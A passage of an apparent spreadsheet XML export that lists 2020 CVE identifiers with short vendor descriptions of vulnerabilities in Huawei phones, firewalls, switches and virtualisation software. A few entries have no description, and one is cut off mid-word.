    <t>Huawei products IPS Module; NGFW Module; NIP6300; NIP6600; NIP6800; Secospace USG6300; Secospace USG6500; Secospace USG6600; USG9500 with versions of V500R001C00; V500R001C20; V500R001C30; V500R001C50; V500R001C60; V500R001C80; V500R005C00; V500R005C10; V500R005C20; V500R002C00; V500R002C10; V500R002C20; V500R002C30 have an improper authentication vulnerability. Attackers need to perform some operations to exploit the vulnerability. Successful exploit may obtain certain permissions on the device.</t>
  </si>
  <si>
    <t>CVE-2020-9100</t>
  </si>
  <si>
    <t>Earlier than HiSuite 10.1.0.500 have a DLL hijacking vulnerability. This vulnerability exists due to some DLL file is loaded by HiSuite improperly. And it allows an attacker to load this DLL file of the attacker's choosing.</t>
  </si>
  <si>
    <t>CVE-2020-9101</t>
  </si>
  <si>
    <t>There is an out-of-bounds write vulnerability in some products. An unauthenticated attacker crafts malformed packets with specific parameter and sends the packets to the affected products. Due to insufficient validation of packets, which may be exploited to cause the process reboot. Affected product versions include: IPS Module versions V500R005C00, V500R005C10; NGFW Module versions V500R005C00, V500R005C10; Secospace USG6300 versions V500R001C30, V500R001C60, V500R005C00, V500R005C10; Secospace USG6500 versions V500R001C30, V500R001C60, V500R005C00, V500R005C10; Secospace USG6600 versions V500R001C30, V500R001C60, V500R005C00, V500R005C10; USG9500 versions V500R001C30, V500R001C60, V500R005C00, V500R005C10</t>
  </si>
  <si>
    <t>CVE-2020-9102</t>
  </si>
  <si>
    <t>There is a information leak vulnerability in some Huawei products, and it could allow a local attacker to get information. The vulnerability is due to the improper management of the username. An attacker with the ability to access the device and cause the username information leak. Affected product versions include: CloudEngine 12800 versions V200R002C50SPC800, V200R003C00SPC810, V200R005C00SPC800, V200R005C10SPC800, V200R019C00SPC800; CloudEngine 5800 versions V200R002C50SPC800, V200R003C00SPC810, V200R005C00SPC800, V200R005C10SPC800, V200R019C00SPC800; CloudEngine 6800 versions V200R002C50SPC800, V200R003C00SPC810, V200R005C00SPC800, V200R005C10SPC800, V200R005C20SPC800, V200R019C00SPC800; CloudEngine 7800 versions V200R002C50SPC800, V200R003C00SPC810, V200R005C00SPC800, V200R005C10SPC800, V200R019C00SPC800</t>
  </si>
  <si>
    <t>CVE-2020-9103</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones with 9.0.0.205(C00E205R2P1) have a logic error vulnerability. In a special scenario, the system does not properly process. As a result, attackers can perform a series of operations to successfully establish P2P connections that are rejected by the peer end. As a result, the availability of the device is affected.</t>
  </si>
  <si>
    <t>CVE-2020-9104</t>
  </si>
  <si>
    <t>HUAWEI P30 smartphones with Versions earlier than 10.1.0.123(C431E22R2P5),Versions earlier than 10.1.0.123(C432E22R2P5),Versions earlier than 10.1.0.126(C10E7R5P1),Versions earlier than 10.1.0.126(C185E4R7P1),Versions earlier than 10.1.0.126(C461E7R3P1),Versions earlier than 10.1.0.126(C605E19R1P3),Versions earlier than 10.1.0.126(C636E7R3P4),Versions earlier than 10.1.0.128(C635E3R2P4),Versions earlier than 10.1.0.160(C00E160R2P11),Versions earlier than 10.1.0.160(C01E160R2P11) have a denial of service vulnerability. In specific scenario, due to the improper resource management and memory leak of some feature, the attacker could exploit this vulnerability to cause the device reset.</t>
  </si>
  <si>
    <t>CVE-2020-9105</t>
  </si>
  <si>
    <t>Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an insufficient input validation vulnerability. Due to the input validation logic is incorrect, an attacker can exploit this vulnerability to access and modify the memory of the device by doing a series of operations. Successful exploit may cause the service abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-9106</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have a path traversal vulnerability. The system does not sufficiently validate certain pathname, successful exploit could allow the attacker access files and cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9107</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have an out-of-bounds read and write vulnerability. An unauthenticated attacker crafts malformed message with specific parameter and sends the message to the affected products. Due to insufficient validation of message, which may be exploited to cause the process reboot.</t>
  </si>
  <si>
    <t>CVE-2020-9108</t>
  </si>
  <si>
    <t>CVE-2020-9109</t>
  </si>
  <si>
    <t>There is an information disclosure vulnerability in several smartphones. The device does not sufficiently validate the identity of smart wearable device in certain specific scenario, the attacker need to gain certain information in the victim's smartphone to launch the attack, and successful exploit could cause information disclosure.Affected product versions include:HUAWEI Mate 20 versions earlier than 10.1.0.160(C00E160R3P8),versions earlier than 10.1.0.160(C01E160R2P8);HUAWEI Mate 20 X versions earlier than 10.1.0.160(C00E160R2P8),versions earlier than 10.1.0.160(C01E160R2P8);HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8);Laya-AL00EP versions earlier than 10.1.0.160(C786E160R3P8);Tony-AL00B versions earlier than 10.1.0.160(C00E160R2P11);Tony-TL00B versions earlier than 10.1.0.160(C01E160R2P11).</t>
  </si>
  <si>
    <t>CVE-2020-9110</t>
  </si>
  <si>
    <t>Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an information disclosure vulnerability. The device does not sufficiently validate the output of device in certain specific scenario, the attacker can gain information in the victim's smartphone to launch the attack, successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9111</t>
  </si>
  <si>
    <t>E6878-370 versions 10.0.3.1(H557SP27C233),10.0.3.1(H563SP21C233) and E6878-870 versions 10.0.3.1(H557SP27C233),10.0.3.1(H563SP11C233) have a denial of service vulnerability. The system does not properly check some events, an attacker could launch the events continually, successful exploit could cause reboot of the process.</t>
  </si>
  <si>
    <t>CVE-2020-9112</t>
  </si>
  <si>
    <t>Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a privilege elevation vulnerability. Due to lack of privilege restrictions on some of the business functions of the device. An attacker could exploit this vulnerability to access the protecting information, resulting in the elevation of the privilege.</t>
  </si>
  <si>
    <t>CVE-2020-9113</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 versions earlier than 10.0.0.188(C00E74R3P8) have a buffer overflow vulnerability in the Bluetooth module. Due to insufficient input validation, an unauthenticated attacker may craft Bluetooth messages after successful paring, causing buffer overflow. Successful exploit may cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9114</t>
  </si>
  <si>
    <t>FusionCompute versions 6.3.0, 6.3.1, 6.5.0, 6.5.1 and 8.0.0 have a privilege escalation vulnerability. Due to improper privilege management, an attacker with common privilege may access some specific files and get the administrator privilege in the affected products. Successful exploit will cause privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9115</t>
  </si>
  <si>
    <t>ManageOne versions 6.5.1.1.B010, 6.5.1.1.B020, 6.5.1.1.B030, 6.5.1.1.B040, ,6.5.1.1.B050, 8.0.0 and 8.0.1 have a command injection vulnerability. An attacker with high privileges may exploit this vulnerability through some operations on the plug-in component. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject commands to the target device.</t>
  </si>
  <si>
    <t>CVE-2020-9116</t>
  </si>
  <si>
    <t>Huawei FusionCompute versions 6.5.1 and 8.0.0 have a command injection vulnerability. An authenticated, remote attacker can craft specific request to exploit this vulnerability. Due to insufficient verification, this could be exploited to cause the attackers to obtain higher privilege.</t>
  </si>
  <si>
    <t>CVE-2020-9117</t>
  </si>
  <si>
    <t>HUAWEI nova 4 versions earlier than 10.0.0.165(C01E34R2P4) and SydneyM-AL00 versions earlier than 10.0.0.165(C00E66R1P5) have an out-of-bounds read and write vulnerability. An attacker with specific permissions crafts malformed packet with specific parameter and sends the packet to the affected products. Due to insufficient validation of packet, which may be exploited to cause the information leakage or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9118</t>
  </si>
  <si>
    <t>There is an insufficient integrity check vulnerability in Huawei Sound X Product. The system does not check certain software package's integrity sufficiently. Successful exploit could allow an attacker to load a crafted software package to the device. Affected product versions include:AIS-BW80H-00 versions 9.0.3.1(H100SP13C00),9.0.3.1(H100SP18C00),9.0.3.1(H100SP3C00),9.0.3.1(H100SP9C00),9.0.3.2(H100SP1C00),9.0.3.2(H100SP2C00),9.0.3.2(H100SP5C00),9.0.3.2(H100SP8C00),9.0.3.3(H100SP1C00).</t>
  </si>
  <si>
    <t>CVE-2020-9119</t>
  </si>
  <si>
    <t>There is a privilege escalation vulnerability on some Huawei smart phones due to design defects. The attacker needs to physically contact the mobile phone and obtain higher privileges, and execute relevant commands, resulting in the user's privilege promotion.</t>
  </si>
  <si>
    <t>CVE-2020-9120</t>
  </si>
  <si>
    <t>CloudEngine 1800V versions V100R019C10SPC500 has a resource management error vulnerability. Remote unauthorized attackers could send specific types of messages to the device, resulting in the message received by the system can't be forwarded normally.</t>
  </si>
  <si>
    <t>CVE-2020-9122</t>
  </si>
  <si>
    <t>Some Huawei products have an insufficient input verification vulnerability. Attackers can exploit this vulnerability in the LAN to cause service abnormal on affected devices.Affected product versions include:HiRouter-CD30-10 version 10.0.2.5;HiRouter-CT31-10 version 10.0.2.20;WS5200-12 version 10.0.1.9;WS5281-10 version 10.0.5.10;WS5800-10 version 10.0.3.25;WS7100-10 version 10.0.5.21;WS7200-10 version 10.0.5.21.</t>
  </si>
  <si>
    <t>CVE-2020-9123</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) and versions earlier than 10.1.0.160(C01E160R2P8) have a buffer overflow vulnerability. An attacker induces users to install malicious applications and sends specially constructed packets to affected devices after obtaining the root permission. Successful exploit may cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9124</t>
  </si>
  <si>
    <t>There is a memory leak vulnerability in some versions of Huawei CloudEngine product. An unauthenticated, remote attacker may exploit this vulnerability by sending specific message to the affected product. Due to not release the allocated memory properly, successful exploit may cause memory leak.</t>
  </si>
  <si>
    <t>CVE-2020-9125</t>
  </si>
  <si>
    <t>There is an out-of-bound read vulnerability in huawei smartphone Mate 30 versions earlier than 10.1.0.156 (C00E155R7P2). An attacker with specific permission can exploit this vulnerability by sending crafted packet with specific parameter to the target device. Due to insufficient validation of the parameter, successful exploit can cause the device to behave abnormally.</t>
  </si>
  <si>
    <t>CVE-2020-9127</t>
  </si>
  <si>
    <t>Some Huawei products have a command injection vulnerability. Due to insufficient input validation, an attacker with high privilege may inject some malicious codes in some files of the affected products. Successful exploit may cause command injection.Affected product versions include:NIP6300 versions V500R001C30,V500R001C60;NIP6600 versions V500R001C30,V500R001C60;Secospace USG6300 versions V500R001C30,V500R001C60;Secospace USG6500 versions V500R001C30,V500R001C60;Secospace USG6600 versions V500R001C30,V500R001C60;USG9500 versions V500R001C30,V500R001C60.</t>
  </si>
  <si>
    <t>CVE-2020-9128</t>
  </si>
  <si>
    <t>FusionCompute versions 8.0.0 have an insecure encryption algorithm vulnerability. Attackers with high permissions can exploit this vulnerability to cause information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9129</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 versions earlier than 10.1.0.159(C00E159R7P2) have a vulnerability of improper buffer operation. Due to improper restrictions, local attackers with high privileges can exploit the vulnerability to cause system heap overflow.</t>
  </si>
  <si>
    <t>CVE-2020-9137</t>
  </si>
  <si>
    <t>There is a privilege escalation vulnerability in some versions of CloudEngine 12800,CloudEngine 5800,CloudEngine 6800 and CloudEngine 7800. Due to insufficient input validation, a local attacker with high privilege may execute some specially crafted scripts in the affected products. Successful exploit will cause privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9138</t>
  </si>
  <si>
    <t>There is a heap-based buffer overflow vulnerability in some Huawei Smartphone, Successful exploit of this vulnerability can cause process exceptions during updating.</t>
  </si>
  <si>
    <t>CVE-2020-9139</t>
  </si>
  <si>
    <t>There is a improper input validation vulnerability in some Huawei Smartphone.Successful exploit of this vulnerability can cause memory access errors and denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9140</t>
  </si>
  <si>
    <t>There is a vulnerability with buffer access with incorrect length value in some Huawei Smartphone.Unauthorized users may trigger code execution when a buffer overflow occurs.</t>
  </si>
  <si>
    <t>CVE-2020-9141</t>
  </si>
  <si>
    <t>There is a improper privilege management vulnerability in some Huawei smartphone. Successful exploitation of this vulnerability can cause information disclosure and malfunctions due to insufficient verification of data authenticity.</t>
  </si>
  <si>
    <t>CVE-2020-9142</t>
  </si>
  <si>
    <t>There is a heap base buffer overflow vulnerability in some Huawei smartphone.Successful exploitation of this vulnerability can cause heap overflow and memory overwriting when the system incorrectly processes the update file.</t>
  </si>
  <si>
    <t>CVE-2020-9143</t>
  </si>
  <si>
    <t>There is a missing authentication vulnerability in some Huawei smartphone.Successful exploitation of this vulnerability may lead to low-sensitive information exposure.</t>
  </si>
  <si>
    <t>CVE-2020-9144</t>
  </si>
  <si>
    <t>There is a heap overflow vulnerability in some Huawei smartphone, attackers can exploit this vulnerability to cause heap overflows due to improper restriction of operations within the bounds of a memory buffer.</t>
  </si>
  <si>
    <t>CVE-2020-9145</t>
  </si>
  <si>
    <t>There is an Out-of-bounds Write vulnerability in some Huawei smartphone. Successful exploitation of this vulnerability may cause out-of-bounds access to the physical memory.</t>
  </si>
  <si>
    <t>CVE-2020-9146</t>
  </si>
  <si>
    <t>A memory buffer error vulnerability exists in a component interface of Huawei Smartphone. Local attackers can exploit this vulnerability to cause memory leakage and doS attacks by carefully constructing attack scenarios.</t>
  </si>
  <si>
    <t>CVE-2020-9147</t>
  </si>
  <si>
    <t>A memory buffer error vulnerability exists in a component interface of Huawei Smartphone. Local attackers may exploit this vulnerability by carefully constructing attack scenarios to cause out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2020-9148</t>
  </si>
  <si>
    <t>An application bypass mechanism vulnerability exists in a component interface of Huawei Smartphone. Local attackers can exploit this vulnerability to delete user SMS messages.</t>
  </si>
  <si>
    <t>CVE-2020-9149</t>
  </si>
  <si>
    <t>An application error verification vulnerability exists in a component interface of Huawei Smartphone. Local attackers can exploit this vulnerability to modify and delete user SMS messages.</t>
  </si>
  <si>
    <t>CVE-2020-9158</t>
  </si>
  <si>
    <t>There is a Missing Cryptographic Step vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause DoS of Samgr.</t>
  </si>
  <si>
    <t>CVE-2020-9199</t>
  </si>
  <si>
    <t>B2368-22 V100R001C00;B2368-57 V100R001C00;B2368-66 V100R001C00 have a command injection vulnerability. An attacker with high privileges may exploit this vulnerability through some operations on the LAN. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject commands to the target device.</t>
  </si>
  <si>
    <t>CVE-2020-9200</t>
  </si>
  <si>
    <t>There has a CSV injection vulnerability in iManager NetEco 6000 versions V600R021C00. An attacker with common privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device.</t>
  </si>
  <si>
    <t>CVE-2020-9201</t>
  </si>
  <si>
    <t>There is an out-of-bounds read vulnerability in some versions of NIP6800, Secospace USG6600 and USG9500. The software reads data past the end of the intended buffer when parsing DHCP messages including crafted parameter. Successful exploit could cause certain service abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-9202</t>
  </si>
  <si>
    <t>There is an information disclosure vulnerability in TE Mobile software versions V600R006C10,V600R006C10SPC100. Due to the improper storage of some information in certain specific scenario, the attacker can gain information in the victim's device to launch the attack, successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9203</t>
  </si>
  <si>
    <t>There is a resource management errors vulnerability in Huawei P30. Local attackers construct broadcast message for some application, causing this application to send this broadcast message and impact the customer's use experience.</t>
  </si>
  <si>
    <t>CVE-2020-9205</t>
  </si>
  <si>
    <t>There has a CSV injection vulnerability in ManageOne 8.0.1. An attacker with common privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device.</t>
  </si>
  <si>
    <t>CVE-2020-9206</t>
  </si>
  <si>
    <t>The eUDC660 product has a resource management vulnerability. An attacker with high privilege needs to perform specific operations to exploit the vulnerability on the affected device. Due to improper resource management of the device, as a result, the key file can be obtained and data can be decrypted, affecting confidentiality, integrity, and availability of the device.</t>
  </si>
  <si>
    <t>CVE-2020-9207</t>
  </si>
  <si>
    <t>There is an improper authentication vulnerability in some verisons of Huawei CloudEngine product. A module does not verify the input file properly. Attackers can exploit this vulnerability by crafting malicious files to bypass current verification mechanism. This can compromise normal service.</t>
  </si>
  <si>
    <t>CVE-2020-9208</t>
  </si>
  <si>
    <t>There is an information leak vulnerability in iManager NetEco 6000 versions V600R021C00. A module is lack of authentication. Attackers without access to the module can exploit this vulnerability to obtain extra information, leading to information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9209</t>
  </si>
  <si>
    <t>There is a privilege escalation vulnerability in SMC2.0 product. Some files in a directory of a module are located improperly. It does not apply the directory limitation. Attackers can exploit this vulnerability by crafting malicious file to launch privilege escalation. This can compromise normal service of affected products.</t>
  </si>
  <si>
    <t>CVE-2020-9212</t>
  </si>
  <si>
    <t>There is a vulnerability in some version of USG9500 that the device improperly handles the information when a user logs in to device. The attacker can exploit the vulnerability to perform some operation and can get information and cause information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9213</t>
  </si>
  <si>
    <t>There is a denial of service vulnerability in some huawei products. In specific scenarios, due to the improper handling of the packets, an attacker may craft many specific packets. Successful exploit may cause some services to be abnormal. Affected products include some versions of NGFW Module, NIP6300, NIP6600, NIP6800, Secospace USG6300, Secospace USG6500, Secospace USG6600 and SG9500.</t>
  </si>
  <si>
    <t>CVE-2020-9223</t>
  </si>
  <si>
    <t>There is a denial of service vulnerability in some Huawei smartphones. Due to the improper processing of received abnormal messages, remote attackers may exploit this vulnerability to cause a denial of service (DoS) on the specific module.</t>
  </si>
  <si>
    <t>CVE-2020-9225</t>
  </si>
  <si>
    <t>FusionSphere OpenStack 6.5.1 have an improper permissions management vulnerability. The software does not correctly perform a privilege assignment when an actor attempts to perform an action. Successful exploit could allow certain user to do certain operations beyond its privilege.</t>
  </si>
  <si>
    <t>CVE-2020-9226</t>
  </si>
  <si>
    <t>HUAWEI P30 with versions earlier than 10.1.0.135(C00E135R2P11) have an improper signature verification vulnerability. The system does not improper check signature of specific software package, an attacker may exploit this vulnerability to load a crafted software package to the device.</t>
  </si>
  <si>
    <t>CVE-2020-9227</t>
  </si>
  <si>
    <t>Huawei Smart Phones Moana-AL00B with versions earlier than 10.1.0.166 have a missing initialization of resource vulnerability. An attacker tricks the user into installing then running a crafted application. Due to improper initialization of specific parameters, successful exploit of this vulnerability may cause device exceptions.</t>
  </si>
  <si>
    <t>CVE-2020-9228</t>
  </si>
  <si>
    <t>FusionCompute 8.0.0 has an information disclosure vulnerability. Due to the properly protection of certain information, attackers may exploit this vulnerability to obtain certain information.</t>
  </si>
  <si>
    <t>CVE-2020-9229</t>
  </si>
  <si>
    <t>CVE-2020-9230</t>
  </si>
  <si>
    <t>WS5800-10 version 10.0.3.25 has a denial of service vulnerability. Due to improper verification of specific message, an attacker may exploit this vulnerability to cause specific function to become abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-9233</t>
  </si>
  <si>
    <t>FusionCompute 8.0.0 have an insufficient authentication vulnerability. An attacker may exploit the vulnerability to delete some files and cause some services abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-9235</t>
  </si>
  <si>
    <t>Huawei smartphones HONOR 20 PRO Versions earlier than 10.1.0.230(C432E9R5P1),Versions earlier than 10.1.0.231(C10E3R3P2),Versions earlier than 10.1.0.231(C185E3R5P1),Versions earlier than 10.1.0.231(C636E3R3P1);Versions earlier than 10.1.0.212(C432E10R3P4),Versions earlier than 10.1.0.213(C636E3R4P3),Versions earlier than 10.1.0.214(C10E5R4P3),Versions earlier than 10.1.0.214(C185E3R3P3);Versions earlier than 10.1.0.212(C00E210R5P1);Versions earlier than 10.1.0.160(C00E160R2P11);Versions earlier than 10.1.0.160(C00E160R2P11);Versions earlier than 10.1.0.160(C01E160R2P11);Versions earlier than 10.1.0.160(C00E160R2P11);Versions earlier than 10.1.0.160(C00E160R8P12);Versions earlier than 10.1.0.230(C432E9R5P1),Versions earlier than 10.1.0.231(C10E3R3P2),Versions earlier than 10.1.0.231(C636E3R3P1);Versions earlier than 10.1.0.225(C431E3R1P2),Versions earlier than 10.1.0.225(C432E3R1P2) contain an information vulnerability. A module has a design error that is lack of control of input. Attackers can exploit this vulnerability to obtain some information. This can lead to information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9237</t>
  </si>
  <si>
    <t>Huawei smartphone Taurus-AL00B with versions earlier than 10.1.0.126(C00E125R5P3) have a user after free vulnerability. A module is lack of lock protection. Attackers can exploit this vulnerability by launching specific request. This could compromise normal service of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-9238</t>
  </si>
  <si>
    <t>Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a buffer overflow vulnerability. A function in a module does not verify inputs sufficiently. Attackers can exploit this vulnerability by sending specific request. This could compromise normal service of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-9239</t>
  </si>
  <si>
    <t>Huawei smartphones BLA-A09 versions 8.0.0.123(C212),versions earlier than 8.0.0.123(C567),versions earlier than 8.0.0.123(C797);BLA-TL00B versions earlier than 8.1.0.326(C01);Berkeley-L09 versions earlier than 8.0.0.163(C10),versions earlier than 8.0.0.163(C432),Versions earlier than 8.0.0.163(C636),Versions earlier than 8.0.0.172(C10);Duke-L09 versions Duke-L09C10B187, versions Duke-L09C432B189, versions Duke-L09C636B189;HUAWEI P20 versions earlier than 8.0.1.16(C00);HUAWEI P20 Pro versions earlier than 8.1.0.152(C00);Jimmy-AL00A versions earlier than Jimmy-AL00AC00B172;LON-L29D versions LON-L29DC721B192;NEO-AL00D versions earlier than 8.1.0.172(C786);Stanford-AL00 versions Stanford-AL00C00B123;Toronto-AL00 versions earlier than Toronto-AL00AC00B225;Toronto-AL00A versions earlier than Toronto-AL00AC00B225;Toronto-TL10 versions earlier than Toronto-TL10C01B225 have an information vulnerability. A module has a design error that is lack of control of input. Attackers can exploit this vulnerab</t>
  </si>
  <si>
    <t>CVE-2020-9240</t>
  </si>
  <si>
    <t>CVE-2020-9241</t>
  </si>
  <si>
    <t>Huawei 5G Mobile WiFi E6878-370 with versions of 10.0.3.1(H563SP1C00),10.0.3.1(H563SP21C233) have an improper authorization vulnerability. The device does not restrict certain data received from WAN port. Successful exploit could allow an attacker at WAN side to manage certain service of the device.</t>
  </si>
  <si>
    <t>CVE-2020-9242</t>
  </si>
  <si>
    <t>FusionCompute 8.0.0 have a command injection vulnerability. The software does not sufficiently validate certain parameters post from user, successful exploit could allow an authenticated attacker to launch a command injection attack.</t>
  </si>
  <si>
    <t>CVE-2020-9243</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a denial of service vulnerability. The system does not properly limit the depth of recursion, an attacker should trick the user installing and execute a malicious application. Successful exploit could cause a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-9244</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 versions Versions earlier than 10.1.0.160(C00E160R3P8);HUAWEI Mate 20 Pro versions Versions earlier than 10.1.0.270(C431E7R1P5),Versions earlier than 10.1.0.270(C635E3R1P5),Versions earlier than 10.1.0.273(C636E7R2P4);HUAWEI Mate 20 X versions Versions earlier than 10.1.0.160(C00E160R2P8);HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10.1.0.160(C00E160R2P8);HUAWEI Mate 20 RS versions Versions earlier than 10.1.0.160(C786E160R3P8);HonorMagic2 versions Versions earlier than 10.0.0.187(C00E61R2P11);Honor20 versions Versions earlier than 10.0.0.175(C00E58R4P11);Honor20 PRO versions Versions earlier than 10.0.0.194(C00E62R8P12);HonorMagic2 versions Versions earlier than 10.0.0.187(C00E61R2P11);HonorV20 versions Versions earlier than 10.0.0.188(C00E62R2P11) have an improper authentication vulnerability. The system does not properly sign certain encrypted file, the attacker should gain the key used to encrypt the file, successful exploit could cause certain file be forged</t>
  </si>
  <si>
    <t>CVE-2020-9245</t>
  </si>
  <si>
    <t>HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10.1.0.160(C00E160R2P8) have a denial of service vulnerability. Certain system configuration can be modified because of improper authorization. The attacker could trick the user installing and executing a malicious application, successful exploit could cause a denial of service condition of PHONE function.</t>
  </si>
  <si>
    <t>CVE-2020-9246</t>
  </si>
  <si>
    <t>FusionCompute 8.0.0 has an information leak vulnerability. A module does not launch strict access control and information protection. Attackers with low privilege can get some extra information. This can lead to information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9247</t>
  </si>
  <si>
    <t>There is a buffer overflow vulnerability in several Huawei products. The system does not sufficiently validate certain configuration parameter which is passed from user that would cause buffer overflow. The attacker should trick the user into installing and running a malicious application with a high privilege, successful exploit may cause code execution. Affected product include Huawei HONOR 20 PRO, Mate 20, Mate 20 Pro, Mate 20 X, P30, P30 Pro, Hima-L29C, Laya-AL00EP, Princeton-AL10B, Tony-AL00B, Yale-L61A, Yale-TL00B and YaleP-AL10B.</t>
  </si>
  <si>
    <t>CVE-2020-9248</t>
  </si>
  <si>
    <t>Huawei FusionComput 8.0.0 have an improper authorization vulnerability. A module does not verify some input correctly and authorizes files with incorrect access. Attackers can exploit this vulnerability to launch privilege escalation attack. This can compromise normal service.</t>
  </si>
  <si>
    <t>CVE-2020-9249</t>
  </si>
  <si>
    <t>HUAWEI P30 smartphones with versions earlier than 10.1.0.160(C00E160R2P11) have a denial of service vulnerability. A module does not deal with mal-crafted messages and it leads to memory leak. Attackers can exploit this vulnerability to make the device denial of service.Affected product versions include: HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11).</t>
  </si>
  <si>
    <t>CVE-2020-9251</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones with versions earlier than 10.1.0.160(C00E160R2P11) have an improper authorization vulnerability. The software does not properly restrict certain operation in certain scenario, the attacker should do certain configuration before the user turns on student mode function. Successful exploit could allow the attacker to bypass the limit of student mode function. Affected product versions include: HUAWEI Mate 20 versions Versions earlier than 10.1.0.160(C00E160R3P8).</t>
  </si>
  <si>
    <t>CVE-2020-9252</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 versions earlier than 10.1.0.160(C00E160R3P8), HUAWEI Mate 20 X versions earlier than 10.1.0.135(C00E135R2P8), HUAWEI Mate 20 RS versions earlier than 10.1.0.160(C786E160R3P8), and Honor Magic2 smartphones versions earlier than 10.1.0.160(C00E160R2P11) have a path traversal vulnerability. The system does not sufficiently validate certain pathname from certain process, successful exploit could allow the attacker write files to a crafted path.</t>
  </si>
  <si>
    <t>CVE-2020-9254</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro smartphones with versions earlier than 10.1.0.123(C432E19R2P5patch02), versions earlier than 10.1.0.126(C10E11R5P1), and versions earlier than 10.1.0.160(C00E160R2P8) have a logic check error vulnerability. A logic error occurs when the software checking the size of certain parameter, the attacker should trick the user into installing a malicious application, successful exploit may cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9255</t>
  </si>
  <si>
    <t>Huawei Honor 10 smartphones with versions earlier than 10.0.0.178(C00E178R1P4) have a denial of service vulnerability. Certain service in the system does not sufficiently validate certain parameter which is received, the attacker should trick the user into installing a malicious application, successful exploit could cause a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-9256</t>
  </si>
  <si>
    <t>Huawei Mate 30 Pro smartphones with versions earlier than 10.1.0.150(C00E136R5P3) have an improper authorization vulnerability. The system does not properly restrict the use of system service by applications, the attacker should trick the user into installing a malicious application, successful exploit could cause a denial of audio service.</t>
  </si>
  <si>
    <t>CVE-2020-9257</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro smartphones with versions earlier than 10.1.0.123(C432E19R2P5patch02), versions earlier than 10.1.0.126(C10E11R5P1), and versions earlier than 10.1.0.160(C00E160R2P8) have a buffer overflow vulnerability. The software access data past the end, or before the beginning, of the intended buffer when handling certain operations of certificate, the attacker should trick the user into installing a malicious application, successful exploit may cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9258</t>
  </si>
  <si>
    <t>HUAWEI P30 smartphone with versions earlier than 10.1.0.135(C00E135R2P11) have an improper input verification vulnerability. An attribution in a module is not set correctly and some verification is lacked. Attackers with local access can exploit this vulnerability by injecting malicious fragment. This may lead to user information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9259</t>
  </si>
  <si>
    <t>Huawei Honor V30 smartphones with versions earlier than 10.1.0.212(C00E210R5P1) have an improper authentication vulnerability. The system does not sufficiently validate certain parameter passed from the bottom level, the attacker should trick the user into installing a malicious application and control the bottom level, successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9260</t>
  </si>
  <si>
    <t>HUAWEI P30 and HUAWEI P30 Pro smartphones with versions earlier than 10.1.0.123(C432E22R2P5) and versions earlier than 10.1.0.160(C00E160R2P8) have an information disclosure vulnerability. Certain WI-FI function's default configuration in the system seems insecure, an attacker should craft a WI-FI hotspot to launch the attack. Successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9261</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a type confusion vulnerability. The system does not properly check and transform the type of certain variable, the attacker tricks the user into installing then running a crafted application, successful exploit could cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9262</t>
  </si>
  <si>
